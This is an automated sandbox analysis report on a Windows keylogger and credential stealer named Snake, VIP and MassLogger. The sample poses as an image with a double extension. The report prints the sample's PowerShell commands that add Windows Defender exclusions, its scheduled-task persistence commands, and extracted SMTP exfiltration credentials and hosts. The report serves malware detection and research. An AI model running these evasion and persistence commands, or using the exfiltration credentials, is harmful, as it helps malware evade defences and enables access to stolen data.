
Windows Analysis Report
RFQ_PO_98473009.png.exe

Overview

General Information

Sample name: RFQ_PO_98473009.png.exe
Analysis ID: 1632428
MD5: 1fdcb2296296dd785f8a6306525adf2d
SHA1: e27206dc4673d75417acf22aeec8f2ef18813fe1
SHA256: 9525ab40a71a0892815a416b4a10faea2594349b0f61c3ac16d53c17883d75a4
Tags: exe, user-threatcat_ch

Detection

MSIL Logger, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • RFQ_PO_98473009.png.exe (PID: 7376 cmdline: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe" MD5: 1FDCB2296296DD785F8A6306525ADF2D)
    • powershell.exe (PID: 7496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8100 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7596 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RFQ_PO_98473009.png.exe (PID: 7776 cmdline: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe" MD5: 1FDCB2296296DD785F8A6306525ADF2D)
    • RFQ_PO_98473009.png.exe (PID: 7784 cmdline: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe" MD5: 1FDCB2296296DD785F8A6306525ADF2D)
    • RFQ_PO_98473009.png.exe (PID: 7792 cmdline: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe" MD5: 1FDCB2296296DD785F8A6306525ADF2D)
      • Native_New-Nova.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe" MD5: B25A05357AE8104F3D41F8DC1AAA28AE)
      • Native_snake01.exe (PID: 7944 cmdline: "C:\Users\user\AppData\Local\Temp\Native_snake01.exe" MD5: 0C8E94A89D78431A3F4EBFD9C00C8DB8)
  • svchost.exe (PID: 7904 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • lVbhkOPdhyxT.exe (PID: 8052 cmdline: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe MD5: 1FDCB2296296DD785F8A6306525ADF2D)
    • schtasks.exe (PID: 5700 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp4227.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • lVbhkOPdhyxT.exe (PID: 4024 cmdline: "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe" MD5: 1FDCB2296296DD785F8A6306525ADF2D)
      • Native_New-Nova.exe (PID: 3000 cmdline: "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe" MD5: B25A05357AE8104F3D41F8DC1AAA28AE)
      • Native_snake01.exe (PID: 2524 cmdline: "C:\Users\user\AppData\Local\Temp\Native_snake01.exe" MD5: 0C8E94A89D78431A3F4EBFD9C00C8DB8)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587"}
{"EXfil Mode": "SMTP", "From": "path@xma0.com", "Password": "london@1759", "Server": "mail.xma0.com"}
{"Exfil Mode": "SMTP", "Username": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587", "Version": "4.4"}
Source / Rule / Description / Author / Strings
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Rule: MALWARE_Win_RedLine; Description: Detects RedLine infostealer; Author: ditekSHen; Strings:
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 4F 88 44 24 2B 88 44 24 2F B0 B9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe; Rule: MALWARE_Win_RedLine; Description: Detects RedLine infostealer; Author: ditekSHen; Strings:
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
Source / Rule / Description / Author / Strings
Source: 0000000C.00000002.3625599331.00000000025C4000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 0000000C.00000002.3625599331.00000000025C4000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_VIPKeylogger; Description: Yara detected VIP Keylogger; Author: Joe Security
Source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_VIPKeylogger; Description: Yara detected VIP Keylogger; Author: Joe Security
Source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_TelegramRAT; Description: Yara detected Telegram RAT; Author: Joe Security
Source / Rule / Description / Author / Strings
Source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack; Rule: JoeSecurity_MassLogger; Description: Yara detected MassLogger RAT; Author: Joe Security
Source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack; Rule: JoeSecurity_MSILLogger; Description: Yara detected MSIL Logger; Author: Joe Security
Source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack; Rule: JoeSecurity_TelegramRAT; Description: Yara detected Telegram RAT; Author: Joe Security
Source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, ParentProcessId: 7376, ParentProcessName: RFQ_PO_98473009.png.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ProcessId: 7496, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, ParentProcessId: 7376, ParentProcessName: RFQ_PO_98473009.png.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ProcessId: 7496, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp4227.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp4227.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe, ParentImage: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe, ParentProcessId: 8052, ParentProcessName: lVbhkOPdhyxT.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp4227.tmp", ProcessId: 5700, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, ParentProcessId: 7376, ParentProcessName: RFQ_PO_98473009.png.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp", ProcessId: 7596, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, ParentProcessId: 7376, ParentProcessName: RFQ_PO_98473009.png.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ProcessId: 7496, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7904, ProcessName: svchost.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, ParentProcessId: 7376, ParentProcessName: RFQ_PO_98473009.png.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp", ProcessId: 7596, ProcessName: schtasks.exe
Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-03-07T23:40:05.126761+0100  2803305  3         Unknown Traffic          192.168.2.4  49720        104.21.64.1      443               TCP
2025-03-07T23:40:18.685568+0100  2803305  3         Unknown Traffic          192.168.2.4  49733        104.21.64.1      443               TCP
2025-03-07T23:40:20.683459+0100  2803305  3         Unknown Traffic          192.168.2.4  49735        104.21.64.1      443               TCP
2025-03-07T23:40:21.517793+0100  2803305  3         Unknown Traffic          192.168.2.4  49737        104.21.64.1      443               TCP
2025-03-07T23:40:23.483791+0100  2803305  3         Unknown Traffic          192.168.2.4  49739        104.21.64.1      443               TCP
2025-03-07T23:40:24.347356+0100  2803305  3         Unknown Traffic          192.168.2.4  49741        104.21.64.1      443               TCP
2025-03-07T23:40:32.113259+0100  2803305  3         Unknown Traffic          192.168.2.4  49751        104.21.64.1      443               TCP

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-03-07T23:39:58.253700+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49713        193.122.130.0    80                TCP
2025-03-07T23:39:58.834712+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49714        193.122.130.0    80                TCP
2025-03-07T23:40:02.968173+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49713        193.122.130.0    80                TCP
2025-03-07T23:40:12.245161+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49726        193.122.130.0    80                TCP
2025-03-07T23:40:12.374503+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49719        193.122.130.0    80                TCP
2025-03-07T23:40:14.093249+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49721        193.122.130.0    80                TCP
2025-03-07T23:40:16.515192+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49719        193.122.130.0    80                TCP
2025-03-07T23:40:19.218334+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49736        193.122.130.0    80                TCP

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-03-07T23:40:34.545131+0100  1810007  1         Potentially Bad Traffic  192.168.2.4  49753        149.154.167.220  443               TCP
2025-03-07T23:40:44.209570+0100  1810007  1         Potentially Bad Traffic  192.168.2.4  49759        149.154.167.220  443               TCP


AV Detection

Source: RFQ_PO_98473009.png.exe; Avira: detected
Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe; Avira: detection malicious, Label: TR/Kryptik.ykxbx
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe; Avira: detection malicious, Label: HEUR/AGEN.1305924
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587"}
Source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587", "Version": "4.4"}
Source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "path@xma0.com", "Password": "london@1759", "Server": "mail.xma0.com"}
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Virustotal: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe; ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe; Virustotal: Detection: 84%
Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe; ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe; Virustotal: Detection: 51%
Source: RFQ_PO_98473009.png.exe; Virustotal: Detection: 51%
Source: RFQ_PO_98473009.png.exe; ReversingLabs: Detection: 52%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.8% probability
Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack; String decryptor: phatbills@xma0.com
Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack; String decryptor: london@1759
Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack; String decryptor: mail.xma0.com
Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack; String decryptor: phatbills2@xma0.com
Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack; String decryptor: 587
Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack; String decryptor:

Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: RFQ_PO_98473009.png.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49715 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49716 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49729 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49730 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: RFQ_PO_98473009.png.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: _.pdb source: Native_New-Nova.exe, 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1263456666.0000000000628000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1263777573.0000000000628000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h; Function: 10_2_0200E228
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 04BF93DAh; Function: 10_2_04BF8FA8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 04BF8C81h; Function: 10_2_04BF89D0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 04BF93DAh; Function: 10_2_04BF9307
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DF5185h; Function: 10_2_05DF4E48
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DFF878h; Function: 10_2_05DFF5D0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DF7CA0h; Function: 10_2_05DF79F8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DF4C99h; Function: 10_2_05DF49F0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DF4841h; Function: 10_2_05DF4598
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DF7848h; Function: 10_2_05DF75A0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DF73F0h; Function: 10_2_05DF7148
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DF43E9h; Function: 10_2_05DF4140
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DFF420h; Function: 10_2_05DFF178
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DFEFC8h; Function: 10_2_05DFED20
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DFEB70h; Function: 10_2_05DFE8C8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DF6F98h; Function: 10_2_05DF6CF0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DF3F91h; Function: 10_2_05DF3CE8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DF6B40h; Function: 10_2_05DF6898
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DF3B39h; Function: 10_2_05DF3890
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DF66E8h; Function: 10_2_05DF6440
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DFE718h; Function: 10_2_05DFE470
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DFE2C0h; Function: 10_2_05DFE018
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DF5CCAh; Function: 10_2_05DF5C18
